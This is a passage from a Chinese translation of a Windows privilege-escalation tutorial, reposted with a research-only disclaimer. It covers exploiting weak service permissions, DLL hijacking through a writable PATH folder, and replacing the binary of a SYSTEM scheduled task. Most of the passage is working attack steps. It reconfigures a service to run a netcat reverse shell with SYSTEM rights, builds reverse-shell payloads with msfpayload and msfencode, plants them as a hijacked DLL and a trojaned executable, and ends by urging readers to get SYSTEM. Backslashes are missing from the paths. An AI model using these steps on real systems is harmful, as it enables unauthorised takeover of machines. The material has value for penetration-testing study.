# This is on Windows 8.C:Usersb33ftoolsSysinternals> accesschk.exe -uwcqv "Authenticated Users" *No matching objects found.# On a default Windows XP SP0 we can see there is a pretty big security fail.C:> accesschk.exe -uwcqv "Authenticated Users" *RW SSDPSRVSERVICE_ALL_ACCESSRW upnphostSERVICE_ALL_ACCESSC:> accesschk.exe -ucqv SSDPSRVSSDPSRVRW NT AUTHORITYSYSTEMSERVICE_ALL_ACCESSRW BUILTINAdministratorsSERVICE_ALL_ACCESSRW NT AUTHORITYAuthenticated UsersSERVICE_ALL_ACCESSRW BUILTINPower UsersSERVICE_ALL_ACCESSRW NT AUTHORITYLOCAL SERVICESERVICE_ALL_ACCESSC:> accesschk.exe -ucqv upnphostupnphostRW NT AUTHORITYSYSTEMSERVICE_ALL_ACCESSRW BUILTINAdministratorsSERVICE_ALL_ACCESSRW NT AUTHORITYAuthenticated UsersSERVICE_ALL_ACCESSRW BUILTINPower UsersSERVICE_ALL_ACCESSRW NT AUTHORITYLOCAL SERVICESERVICE_ALL_ACCESS
这个问题在 XP SP2 的引入后得到了解决,然而在 SP0 和 SP1 上,它可以被用作一个通用的本地权限提升漏洞。通过重新配置服务,我们可以让它以 SYSTEM 级别权限运行我们选择的任意二进制文件。
让我们看看这是如何在实践中完成的。在这种情况下,服务将执行 netcat 并以 SYSTEM 级别权限打开一个反向 shell。当然,还有其他选项是可能的。
C:> sc qc upnphost[SC] GetServiceConfig SUCCESSSERVICE_NAME: upnphostTYPE : 20 WIN32_SHARE_PROCESSSTART_TYPE : 3 DEMAND_STARTERROR_CONTROL : 1 NORMALBINARY_PATH_NAME : C:WINDOWSSystem32svchost.exe -k LocalServiceLOAD_ORDER_GROUP :TAG : 0DISPLAY_NAME : Universal Plug and Play Device HostDEPENDENCIES : SSDPSRVSERVICE_START_NAME : NT AUTHORITYLocalServiceC:> sc config upnphost binpath= "C:nc.exe -nv 127.0.0.1 9988 -e C:WINDOWSSystem32cmd.exe"[SC] ChangeServiceConfig SUCCESSC:> sc config upnphost obj= ".LocalSystem" password= ""[SC] ChangeServiceConfig SUCCESSC:> sc qc upnphost[SC] GetServiceConfig SUCCESSSERVICE_NAME: upnphostTYPE : 20 WIN32_SHARE_PROCESSSTART_TYPE : 3 DEMAND_STARTERROR_CONTROL : 1 NORMALBINARY_PATH_NAME : C:nc.exe -nv 127.0.0.1 9988 -e C:WINDOWSSystem32cmd.exeLOAD_ORDER_GROUP :TAG : 0DISPLAY_NAME : Universal Plug and Play Device HostDEPENDENCIES : SSDPSRVSERVICE_START_NAME : LocalSystemC:> net start upnphost
我们并不总是能够完全访问一个服务,即使它配置不正确。下面的图片摘自 Brett Moore 在 Windows 权限提升方面的演示,其中的任何访问权限都将给我们一个 SYSTEM shell。
重要的是要记住我们要弄清楚我们受到攻击的会话属于哪些用户组。如前所述,“Power Users”也被认为是一个低权限用户组。"Power Users" 有自己一套漏洞,Mark Russinovich 写了一篇非常有趣的文章,介绍了这个主题。
文章名称是 "The Power in Power Users" (Mark Russinovich) - [这里](https://docs.microsoft.com/en-us/sysinternals/learn/the-power-in-power-users)
最后,我们将检查文件/文件夹权限,如果我们无法直接攻击操作系统,我们将让操作系统来完成所有艰苦的工作。这里需要涵盖的内容太多,所以我将向你展示两种权限漏洞以及如何利用它们。一旦你掌握了一般思路,你就能够将这些技术应用到其他情况中。
对于我们的第一个例子,我们将复制 GreyHatHacker 的 Parvez 写的一篇文章的结果;"Elevating privileges by exploiting weak folder permissions"。这是一个很好的权限提升文章,我强烈建议你阅读他的文章 [这里](https://www.greyhathacker.net/?p=738)。
这个例子是 DLL 劫持的一个特例。程序通常不能自行运行,它们有很多需要连接的资源(主要是 DLL,但也包括专有文件)。如果一个程序或服务从我们有写访问权限的目录加载文件,我们可以滥用这一点以以程序运行权限弹出一个 shell。
一般来说,Windows 应用程序会使用预定义的搜索路径来查找 DLL,并按特定顺序检查这些路径。DLL 劫持通常发生在将恶意 DLL 放置在其中一个路径中并确保在合法 DLL 之前找到该 DLL 的情况下。这个问题可以通过应用程序指定 DLL 的绝对路径来减轻。
你可以在 32 位系统上看到 DLL 搜索顺序如下:
1 - 应用程序加载的目录
2 - 32 位系统目录 (C:WindowsSystem32)
3 - 16 位系统目录 (C:WindowsSystem)
4 - Windows 目录 (C:Windows)
5 - 当前工作目录 (CWD)
6 - PATH 环境变量中的目录 (系统然后用户)
有时应用程序尝试加载在计算机上不存在的 DLL。这可能是由于几个原因,例如,如果 DLL 仅对某些未安装的插件或功能所需,则会发生这种情况。在这种情况下,Parvez 发现某些 Windows 服务尝试加载默认安装中不存在的 DLL。
由于所涉及的 DLL 不存在,我们将结束遍历所有搜索路径。作为低权限用户,我们几乎无法将恶意 DLL 放置在 1-4 中,5 在这种情况下不可能,因为我们正在讨论一个 Windows 服务,但如果我们对 Windows PATH 中的任何目录具有写访问权限,我们就赢了。
让我们看看这在实践中是如何工作的,对于我们的示例,我们将使用 IKEEXT(IKE 和 AuthIP IPsec Keying Modules)服务,该服务尝试加载 wlbsctrl.dll。
# This is on Windows 7 as low privilege user1.C:Usersuser1Desktop> echo %username%user1# We have a win here since any non-default directory in "C:" will give write access to authenticatedusers.C:Usersuser1Desktop> echo %path%C:Windowssystem32;C:Windows;C:WindowsSystem32Wbem;C:WindowsSystem32WindowsPowerShellv1.0;C:Program FilesOpenVPNbin;C:Python27# We can check our access permissions with accesschk or cacls.C:Usersuser1Desktop> accesschk.exe -dqv "C:Python27"C:Python27Medium Mandatory Level (Default) [No-Write-Up]RW BUILTINAdministratorsFILE_ALL_ACCESSRW NT AUTHORITYSYSTEMFILE_ALL_ACCESSR BUILTINUsersFILE_LIST_DIRECTORYFILE_READ_ATTRIBUTESFILE_READ_EAFILE_TRAVERSESYNCHRONIZEREAD_CONTROLRW NT AUTHORITYAuthenticated UsersFILE_ADD_FILEFILE_ADD_SUBDIRECTORYFILE_LIST_DIRECTORYFILE_READ_ATTRIBUTESFILE_READ_EAFILE_TRAVERSEFILE_WRITE_ATTRIBUTESFILE_WRITE_EADELETESYNCHRONIZEREAD_CONTROLC:Usersuser1Desktop> cacls "C:Python27"C:Python27 BUILTINAdministrators:(ID)FBUILTINAdministrators:(OI)(CI)(IO)(ID)FNT AUTHORITYSYSTEM:(ID)FNT AUTHORITYSYSTEM:(OI)(CI)(IO)(ID)FBUILTINUsers:(OI)(CI)(ID)RNT AUTHORITYAuthenticated Users:(ID)CNT AUTHORITYAuthenticated Users:(OI)(CI)(IO)(ID)C# Before we go over to action we need to check the status of the IKEEXT service. In this case we can seeit is set to "AUTO_START" so it will launch on boot!C:Usersuser1Desktop> sc qc IKEEXT[SC] QueryServiceConfig SUCCESSSERVICE_NAME: IKEEXTTYPE : 20 WIN32_SHARE_PROCESSSTART_TYPE : 2 AUTO_STARTERROR_CONTROL : 1 NORMALBINARY_PATH_NAME : C:Windowssystem32svchost.exe -k netsvcsLOAD_ORDER_GROUP :TAG : 0DISPLAY_NAME : IKE and AuthIP IPsec Keying ModulesDEPENDENCIES : BFESERVICE_START_NAME : LocalSystem
现在我们知道满足的必要条件,我们可以生成一个恶意的 DLL 并弹出一个 shell!
root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' OName: Windows Command Shell, Reverse TCP InlineModule: payload/windows/shell_reverse_tcpPlatform: WindowsArch: x86Needs Admin: NoTotal size: 314Rank: NormalProvided by:vlad902 <[email protected]>sf <[email protected]>Basic options:Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique: seh, thread, process, noneLHOST 127.0.0.1 yes The listen addressLPORT 9988 yes The listen portDescription:Connect back to attacker and spawn a command shellroot@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' D >/root/Desktop/evil.dllCreated by msfpayload (http://www.metasploit.com).Payload: windows/shell_reverse_tcpLength: 314Options: {"lhost"=>"127.0.0.1", "lport"=>"9988"}
在将 DLL 传输到目标计算机后,我们只需要将其重命名为 wlbsctrl.dll,并移动到 "C:Python27"。完成这些步骤后,我们需要耐心等待机器重新启动(或者我们可以尝试强制重新启动),我们将获得一个 SYSTEM shell。
# Again, this is as low privilege user1.C:Usersuser1Desktop> dirVolume in drive C has no label.Volume Serial Number is 948D-A98FDirectory of C:Usersuser1Desktop02/18/2014 01:49 PM <DIR> .02/18/2014 01:49 PM <DIR> ..04/22/2013 09:39 AM 331,888 accesschk.exe02/18/2014 12:38 PM 14,336 evil.dll01/25/2014 12:46 AM 36,864 fubar.exe01/22/2014 08:17 AM <DIR> incognito206/30/2011 01:52 PM 1,667,584 ncat.exe11/22/2013 07:39 PM 1,225 wmic_info.bat5 File(s) 2,051,897 bytes3 Dir(s) 73,052,160 bytes freeC:Usersuser1Desktop> copy evil.dll C:Python27wlbsctrl.dll1 file(s) copied.C:Usersuser1Desktop> dir C:Python27Volume in drive C has no label.Volume Serial Number is 948D-A98FDirectory of C:Python2702/18/2014 01:53 PM <DIR> .02/18/2014 01:53 PM <DIR> ..10/20/2012 02:52 AM <DIR> DLLs10/20/2012 02:52 AM <DIR> Doc10/20/2012 02:52 AM <DIR> include01/28/2014 03:45 AM <DIR> Lib10/20/2012 02:52 AM <DIR> libs04/10/2012 11:34 PM 40,092 LICENSE.txt04/10/2012 11:18 PM 310,875 NEWS.txt04/10/2012 11:31 PM 26,624 python.exe04/10/2012 11:31 PM 27,136 pythonw.exe04/10/2012 11:18 PM 54,973 README.txt10/20/2012 02:52 AM <DIR> tcl10/20/2012 02:52 AM <DIR> Tools04/10/2012 11:31 PM 49,664 w9xpopen.exe02/18/2014 12:38 PM 14,336 wlbsctrl.dll7 File(s) 523,700 bytes9 Dir(s) 73,035,776 bytes free
一切都已设置好,现在我们只需要等待系统重新启动。为了演示目的,我在下面包含了一个截图,在截图中我使用管理员命令提示符手动重启了服务。
在我们的最后一个例子中,我们将看一下计划任务。回顾我们之前收集的结果,我们遇到了以下条目:
HostName: B33FTaskName: LogGrabberTFTPNext Run Time: 2/19/2014 9:00:00 AMStatus: ReadyLogon Mode: Interactive/BackgroundLast Run Time: N/ALast Result: 1Author: B33Fb33fTask To Run: E:GrabLogstftp.exe 10.1.1.99 GET log.out E:GrabLogsLogslog.txtStart In: N/AComment: N/AScheduled Task State: EnabledIdle Time: DisabledPower Management: Stop On Battery Mode, No Start On BatteriesRun As User: SYSTEMDelete Task If Not Rescheduled: EnabledStop Task If Runs X Hours and X Mins: 72:00:00Schedule: Scheduling data is not available in this format.Schedule Type: DailyStart Time: 9:00:00 AMStart Date: 2/17/2014End Date: N/ADays: Every 1 day(s)Months: N/ARepeat: Every: DisabledRepeat: Until: Time: DisabledRepeat: Until: Duration: DisabledRepeat: Stop If Still Running: Disabled
看起来盒子上有一个 TFTP 客户端,它正在连接到远程主机并获取某种日志文件。我们可以看到该任务每天早上 9 点运行,并且以 SYSTEM 级别权限运行(糟糕)。让我们看看我们是否对这个文件夹有写访问权限。
C:Usersuser1Desktop> accesschk.exe -dqv "E:GrabLogs"E:GrabLogsMedium Mandatory Level (Default) [No-Write-Up]RW BUILTINAdministratorsFILE_ALL_ACCESSRW NT AUTHORITYSYSTEMFILE_ALL_ACCESSRW NT AUTHORITYAuthenticated UsersFILE_ADD_FILEFILE_ADD_SUBDIRECTORYFILE_LIST_DIRECTORYFILE_READ_ATTRIBUTESFILE_READ_EAFILE_TRAVERSEFILE_WRITE_ATTRIBUTESFILE_WRITE_EADELETESYNCHRONIZEREAD_CONTROLR BUILTINUsersFILE_LIST_DIRECTORYFILE_READ_ATTRIBUTESFILE_READ_EAFILE_TRAVERSESYNCHRONIZEREAD_CONTROLC:Usersuser1Desktop> dir "E:GrabLogs"Volume in drive E is MoreVolume Serial Number is FD53-2F00Directory of E:GrabLogs02/18/2014 11:34 PM <DIR> .02/18/2014 11:34 PM <DIR> ..02/18/2014 11:34 PM <DIR> Logs02/18/2014 09:21 PM 180,736 tftp.exe1 File(s) 180,736 bytes3 Dir(s) 5,454,602,240 bytes free
显然,这是一个严重的配置问题,这个任务没有必要以 SYSTEM 权限运行,但更糟糕的是,任何经过身份验证的用户都可以对该文件夹进行写访问。理想情况下,对于渗透测试任务,我会获取 TFTP 客户端,对 PE 可执行文件进行后门处理,确保它仍然完美运行,然后将其放回目标机器。然而,出于这个例子的目的,我们可以简单地用 metasploit 生成的可执行文件覆盖二进制文件。
root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' OName: Windows Command Shell, Reverse TCP InlineModule: payload/windows/shell_reverse_tcpPlatform: WindowsArch: x86Needs Admin: NoTotal size: 314Rank: NormalProvided by:vlad902 <[email protected]>sf <[email protected]>Basic options:Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique: seh, thread, process, noneLHOST 127.0.0.1 yes The listen addressLPORT 9988 yes The listen portDescription:Connect back to attacker and spawn a command shellroot@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' R | msfencode -texe > /root/Desktop/evil-tftp.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
现在剩下的就是上传我们的恶意可执行文件并覆盖 "E:GrabLogstftp.exe"。一旦完成,我们就可以早早地入睡,然后在早上醒来等待我们的 shell。这里需要记住的一件重要事情是我们要检查我们试图入侵的盒子的时间/时区。
C:Usersuser1Desktop> dirVolume in drive C has no label.Volume Serial Number is 948D-A98FDirectory of C:Usersuser1Desktop02/19/2014 01:36 AM <DIR> .02/19/2014 01:36 AM <DIR> ..04/22/2013 09:39 AM 331,888 accesschk.exe02/19/2014 01:31 AM 73,802 evil-tftp.exe01/25/2014 12:46 AM 36,864 fubar.exe01/22/2014 08:17 AM <DIR> incognito206/30/2011 01:52 PM 1,667,584 ncat.exe02/18/2014 12:38 PM 14,336 wlbsctrl.dll11/22/2013 07:39 PM 1,225 wmic_info.bat6 File(s) 2,125,699 bytes3 Dir(s) 75,341,824 bytes freeC:Usersuser1Desktop> copy evil-tftp.exe E:GrabLogstftp.exeOverwrite E:GrabLogstftp.exe? (Yes/No/All): Yes1 file(s) copied.
为了展示这种权限提升的实际效果,我将系统时间快进了。从下面的截图中可以看到,我们在早上 9 点准时获得了我们的 SYSTEM shell。
这两个例子应该让你对考虑文件/文件夹权限时需要寻找的漏洞类型有所了解。你需要花时间检查 Windows 服务、计划任务和启动任务的所有 binpaths。
正如我们已经看到的,accesschk 是首选的工具。在结束之前,我想给你一些关于如何使用 accesschk 的最后指导。
# When executing any of the sysinternals tools for the first time the user will be presented with a GUIpop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flagto automatically accept the EULA.accesschk.exe /accepteula ... ... ...# Find all weak folder permissions per drive.accesschk.exe -uwdqs Users c:accesschk.exe -uwdqs "Authenticated Users" c:# Find all weak file permissions per drive.accesschk.exe -uwqs Users c:*.*accesschk.exe -uwqs "Authenticated Users" c:*.*
最后的想法
本指南旨在成为 Windows 权限升级的“基础知识”。如果你想真正掌握这门学科,你需要投入大量的工作和研究。与渗透测试的各个方面一样,枚举是关键,您对目标了解得越多,攻击的途径就越多,成功率就越高。
另请记住,有时您可能最终会将权限提升为管理员。将权限从管理员升级到系统不是问题,您始终可以使用系统级别权限重新配置服务或创建计划任务。
现在去弹出系统吧!
原文地址:https://fuzzysecurity.com/tutorials/16.html
原文始发于微信公众号(Ots安全):Windows 权限提升基础知识
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论